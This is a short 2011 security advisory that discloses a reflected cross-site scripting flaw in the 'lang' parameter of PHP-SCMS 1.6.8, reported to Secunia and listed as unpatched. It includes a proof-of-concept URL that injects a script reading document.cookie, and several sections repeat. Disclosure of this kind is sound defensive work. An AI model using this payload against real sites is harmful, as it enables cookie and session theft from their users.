SSCHADV2011-035 - PHP-SCMS 1.6.8 "lang" parameter XSS vulnerability
Advisory:
|
PHP-SCMS 1.6.8 "lang" parameter XSS vulnerability
|
Advisory ID:
|
SSCHADV2011-035
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on PHP-SCMS 1.6.8
|
Vendor URL:
|
|
Vendor Status:
|
unpatched (no vendor feedback)
|
|
|
======================
Vulnerability Description:
======================
Vulnerability Description:
======================
PHP-SCMS "lang" parameter is prone to a XSS vulnerability
==============
PoC-Exploit
==============
http://<target>/scms/index.php?lang=’"</script><script>alert(document.cookie)</script>
=====
Solution
=====
unpatched
================
Disclosure Timeline
================
08-Nov-2011 – Secunia SVCRP (vuln@secunia.com)
14-Dec-2011 – no vendor feedback
14-Dec-2011 – release date of this security advisory
====
Credits
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References
=======
http://secunia.com/advisories/46766/
http://www.rul3z.de/advisories/SSCHADV2011-035.txt
PoC-Exploit
==============
http://<target>/scms/index.php?lang=’"</script><script>alert(document.cookie)</script>
=====
Solution
=====
unpatched
================
Disclosure Timeline
================
08-Nov-2011 – Secunia SVCRP (vuln@secunia.com)
14-Dec-2011 – no vendor feedback
14-Dec-2011 – release date of this security advisory
====
Credits
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References
=======
http://secunia.com/advisories/46766/
http://www.rul3z.de/advisories/SSCHADV2011-035.txt
Comments
Display comments as Linear | Threaded